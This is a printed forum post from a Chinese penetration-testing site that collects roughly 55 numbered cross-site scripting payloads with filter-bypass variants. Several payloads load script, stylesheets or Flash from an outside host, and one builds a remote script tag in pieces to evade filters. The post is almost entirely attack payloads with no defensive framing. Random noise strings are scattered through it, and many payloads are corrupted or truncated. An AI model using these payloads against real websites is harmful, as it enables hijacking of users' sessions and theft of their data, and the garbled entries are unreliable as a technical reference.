中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入
' a% \  {- f. D% V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 r5 r; N& w4 q0 R+ j+ n
(99)另类弹框
; g+ t1 N6 |" S( B* Z/ `
<q/oncut=alert()>12 O1 I, N* n2 @4 b& g2 J# q
<s/onclick=alert()>b
( u4 u0 G/ [" H0 K <XSS=" onclick="alert(1)//">clickme</SSX=">
# Q8 ~+ X9 t; A* z5 U8 C" v <zzz onclick=alert`1`>clickme</zzz>
/ f8 W+ {% @7 ^' b <a onclick=alert`1`>clickme</a>
7 F: E) @8 U3 }1 R( t* U1 S3 [- b<a=">clickme</a=">, T" Z+ X4 U% U; H6 L3 Q
<a=">clickme</a>
  h" `# e0 h$ S6 X) |; z<z=">clickme</z=">  }; i* A6 W3 T+ X2 W" o! h; p
<z onclick=alert`1`>clickme</z>, [! O3 w1 Z8 H
9 V9 |3 i: c6 @, \% W6 U
(2)IMG标签XSS使用JavaScript命令5 y1 {' a+ r, p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" Q& T2 P% `( Q0 k9 Z
1 h9 k3 R9 P/ }) J/ j
(3)IMG标签无分号无引号
8 z) q5 e' U1 i1 t# B! O
<IMG SRC=javascript:alert(‘XSS’)>
2 T  O* Z' u2 C% C5 @% T
$ I& Y6 {1 v2 w- \2 z# d$ i
(4)IMG标签大小写不敏感4 Z5 ]5 L' L; i0 i# ~) u3 J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ S4 L  X( U5 H- A# _2 d

/ L0 G4 M! Z/ }
(5)HTML编码(必须有分号)
+ _  d+ W4 {( V) D) V* r
<IMG SRC=javascript:alert(“XSS”)>; I' n8 ?4 L3 I# D' [* v

' B; [2 m8 @2 g0 R# `
(6)修正缺陷IMG标签: s& K3 y* Z7 J5 a9 `$ d/ J
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 p0 a0 o8 P; s

* C3 p8 D4 R- f1 W* ~& r: P6 V+ `
(7)formCharCode标签(计算器)
, n, m7 }! ]& ]& }8 {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 r& O5 I$ ^- _" \
  j- ^/ u  `7 A
(8)UTF-8的Unicode编码(计算器)
' f5 J# b7 I: V: t1 a+ D" G
<IMG SRC=jav..省略..S')>
" Q2 O1 X# a0 ?

% V* `6 o7 c+ {% [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器): x7 C: ?8 b' A+ H, n
<IMG SRC=jav..省略..S')>
% C: f- m7 a9 Q8 [$ g

! ~) U" Y. \" K" x1 X7 j4 t  Y+ @
(10)十六进制编码也是没有分号(计算器)4 z* @% o, A( L
<IMG SRC=\'#\'" /span>
/ N9 a0 @2 i) G; j% K( z7 V; S/ q$ J  W/ D  O
(11)嵌入式标签,将Javascript分开, ?# Z( A5 ]: M5 C
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 t% f1 W3 Z: I9 ~+ l$ {& e. Z# o
(12)嵌入式编码标签,将Javascript分开) x) G, d+ F& U0 w' Q) N5 B. W* M$ |1 H
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 K; F5 t, ]& t' ~" }+ n" J! o7 R, L
(13)嵌入式换行符
, s* ?: [# e( g, `, K4 c( A* K<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>' `# g  m! j9 R" p7 x) X& g+ `
+ O1 j+ i. T/ C% s) F. O5 b3 g6 C
(14)嵌入式回车/ M2 E4 E. S4 B0 U/ K+ ?& ^
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 F' j2 A) R9 y( c7 S0 H9 b4 B$ H' Y3 ]9 s2 Q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子- C! k1 q7 I' @" b
<IMG SRC=\'#\'" /span>* ?3 o) \: ]0 X+ \/ ^6 _

& `. W7 l0 y" N9 _5 [. k: U(16)解决限制字符(要求同页面)
7 Q+ O9 `9 R+ U0 Q5 ~9 q2 w" y<script>z=’document.’</script>" N3 n4 q9 F/ }' q
<script>z=z+’write(“‘</script>
6 e/ C' X* m! W2 }; v) I<script>z=z+’<script’</script>) u0 d) g, z4 @- G/ ^; d1 v( \: a
<script>z=z+’ src=ht’</script>% C+ Z' U8 ~. }1 g, M5 N
<script>z=z+’tp://ww’</script>$ S' }. g3 V/ V: T) o; O
<script>z=z+’w.shell’</script>6 @% j5 j! R" T. l. [
<script>z=z+’.net/1.’</script>; z" P8 ^* ?5 V/ c" @  c. p) a8 m
<script>z=z+’js></sc’</script>
) U* m, [# K( |  N<script>z=z+’ript>”)’</script>. r/ I5 q4 A  C  T; B
<script>eval_r(z)</script>; \1 M- w+ H2 a3 X3 }
, z" F$ N# ]6 T3 O7 p5 Z
(17)空字符
+ M5 q# k5 ~' Z* [& V" \& pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 U3 Y& @) q: j/ K. N% [% A9 {4 o+ G% F  _2 _+ b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
- U' l4 H4 ]8 j8 jperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
" |, ~) @* U: v* l; M9 T# h2 Y/ C4 s0 z! I4 [' t8 P
(19)Spaces和meta前的IMG标签
* I+ K7 k) g6 N* m<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
+ G+ m  {6 p: y; @  [7 t( L* T! ^" ?' n4 n8 {( c
(20)Non-alpha-non-digit XSS+ q5 Z+ F9 O2 Z2 z6 T
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
, A" E6 _- b$ K2 T, L7 r& n) |5 \9 b# j- r' E0 z# _7 h2 w$ f5 f/ f
(21)Non-alpha-non-digit XSS to 27 K$ C+ E, n' w$ k
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* j/ @9 h, u6 r) C. H5 }* `2 {/ w  s+ y+ p& X  }
(22)Non-alpha-non-digit XSS to 3
4 G$ n! X5 h, |, n1 B% Z<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>. [# _/ l9 L  C: U

" d6 Y' m& U& r( M8 I8 ~1 H(23)双开括号, b( ]. {* K# P% z3 h! b) b
<<SCRIPT>alert(“XSS”);//<</SCRIPT>+ o4 D3 j5 C- I& M- `/ i
0 C* i. _& Q, e/ M: f
(24)无结束脚本标记(仅火狐等浏览器)1 j6 L/ ?& F- ~) K* @- {& u1 @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# ^5 e9 ?( E; |3 i2 @- T! y6 [7 k1 C9 z) _7 W( n
(25)无结束脚本标记29 @6 D- r0 f1 p. U
<SCRIPT SRC=//3w.org/XSS/xss.js>
* U* U; V8 `& M
3 F$ r( V; V( l! c  }(26)半开的HTML/JavaScript XSS2 W$ P9 A! d6 d2 @( p- A$ w
<IMG SRC=\'#\'" /span>- v+ R) B; O" r# F8 f2 p: J

; Q8 f5 M5 L( [* j3 J) k+ J* v( X(27)双开角括号
, V/ \7 D$ V# f/ h4 o* Z<iframe src=http://3w.org/XSS.html <
9 P2 }3 E# Z+ e" }" P, m2 b
: m  ?/ F+ U8 {' m5 y$ g(28)无单引号 双引号 分号$ K: z& V5 D* t" D
<SCRIPT>a=/XSS/
) O% `% U& c- f7 E* Dalert(a.source)</SCRIPT>) }. ^# n/ @- Y: D" q

- C4 H) d  L# `9 Y) j(29)换码过滤的JavaScript2 g9 H. @3 M/ s: C
\”;alert(‘XSS’);//) h: f: \' Z, A# m/ J" ^4 E0 B

: m9 ~- C8 Q" i- u" P0 G(30)结束Title标签
% T! ^& F' f3 E$ l' d. V</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' e2 ~) b( G7 P! A9 l
' @1 ^9 p7 y+ D
(31)Input Image" c" o; r3 Z+ O5 t0 \  i( Y
<INPUT SRC=\'#\'" /span>; o( y6 I" e! \; P: p
: h- h1 i+ S9 E
(32)BODY Image
1 V! ?9 ~) u# y# L<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* n+ ~1 I: S, z- |+ ?: ^
! E' s/ ]1 {% s7 g  c: A(33)BODY标签
3 v2 W2 @7 ~) l% c% _: r) q<BODY(‘XSS’)>% J& W8 g, T, L' l9 ^6 Z% y
0 s7 A. ]# v! F3 _, U6 o
(34)IMG Dynsrc
, b+ @: A5 z& `( t# `<IMG DYNSRC=\'#\'" /span>: M) n& P8 ]! E( ?2 L
2 C* x3 A! O+ C( F, N
(35)IMG Lowsrc
' U3 c2 W* P3 s# o' \  N, o: Y. j<IMG LOWSRC=\'#\'" /span>
( e& v8 `# _$ U3 W) X! v6 n9 z( S7 m# i, ]
(36)BGSOUND3 D$ ~  s% P0 _0 P0 [
<BGSOUND SRC=\'#\'" /span>: `$ U3 ?+ K/ K( M( p* R7 D' l

- }9 V) v; s) f2 a/ |(37)STYLE sheet9 C7 P$ E% Y: k4 @1 p" J
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- c# ]' q- {" N6 z- W+ |' I& I# D
9 \6 y% Z5 u( u  v* m% v! h
(38)远程样式表0 |! D, e+ K0 D' B0 M8 X: J4 T
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( n2 k% l9 Q' r+ R8 |8 h/ y1 R1 y# {7 Y$ P' K2 D! p2 K+ h- c
(39)List-style-image(列表式)
5 p0 d1 T3 ^0 h* ?  x+ d<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! K$ |! |1 C, }, x6 k
7 w' R2 p5 y0 H7 j(40)IMG VBscript1 W( c7 ^) N5 w: y
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS8 [& d2 E0 Z& D/ P! C9 o+ t
' y( ]+ o9 l. U0 J9 Y) \
(41)META链接url/ Y8 V8 n) W" [9 s7 G) g4 e; D# G
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& ?& C/ G4 l6 n, r+ y
& K7 t; [0 t" e+ I7 n  ~(42)Iframe: b# b8 d: B. @+ X1 C6 K
<IFRAME SRC=\'#\'" /IFRAME>
- t9 D" w  ~- y3 V* \- C' ~4 h4 Q% M! J) i- J8 ]
(43)Frame  R- P6 [1 L2 c/ g/ c8 p- s
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
+ F( p' u9 V. J* q5 S* X5 m  |$ L
(44)Table- |3 r+ c2 P  A2 g& h
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 p3 Z' q0 ]5 d
1 }; p0 _* |. c& I
(45)TD
; u/ ~/ P( Z$ ]5 q9 ?<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ b/ u1 R* L! N
5 F8 H; Z9 Y( n  B+ D
(46)DIV background-image
# I7 y. j) E: a" R7 Q9 w<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& y3 X0 v; l- s' r
, y  A. |# A+ x+ s' q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& o* F# P+ d4 _8 R<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; B! m  F- F' x0 g
1 Q' ^5 W) g% i8 E(48)DIV expression
7 e" R# R* H* f/ l<DIV STYLE=”width: expression_r(alert(‘XSS’));”>6 H& k0 z2 L9 `* y
$ H: r9 H( L1 R6 d: \  E
(49)STYLE属性分拆表达
' ~0 D( j: ~7 J$ w' a6 Q5 r( y5 a<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ G* \2 f! K2 \) E/ |2 U, v

8 Y# m8 _# B6 q4 Q(50)匿名STYLE(组成:开角号和一个字母开头)
  U2 c1 t6 H8 o7 }" d4 f0 }! h<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" y+ }8 T9 P5 U1 V+ O: k# A* v; R4 r( |$ e/ ?$ x" ~
(51)STYLE background-image, ]5 X7 ], `' C/ E
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: ?4 c9 V2 z) O. k8 O+ O, m
2 P  w) o8 J5 [(52)IMG STYLE方式
6 N  b" n4 r' h* {exppression(alert(“XSS”))’>2 s7 Z7 x3 _: n4 C- M7 _6 i, V) G4 h

7 u2 L4 G  K) i0 e8 t(53)STYLE background8 i/ h' T5 d  u' x* K$ t
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' \  [. L6 m7 ^" r! T5 i3 Z
3 r! I2 v* ^6 X(54)BASE$ |( @* P) C) r7 q) d
<BASE HREF=”javascript:alert(‘XSS’);//”>; T/ |) ~6 e' X) k9 @: `

8 e" V9 [& J! c3 R" O/ _0 j% ~(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. w" y" G: a8 e' M
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

, Q/ P: P3 R5 H5 T2 E




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2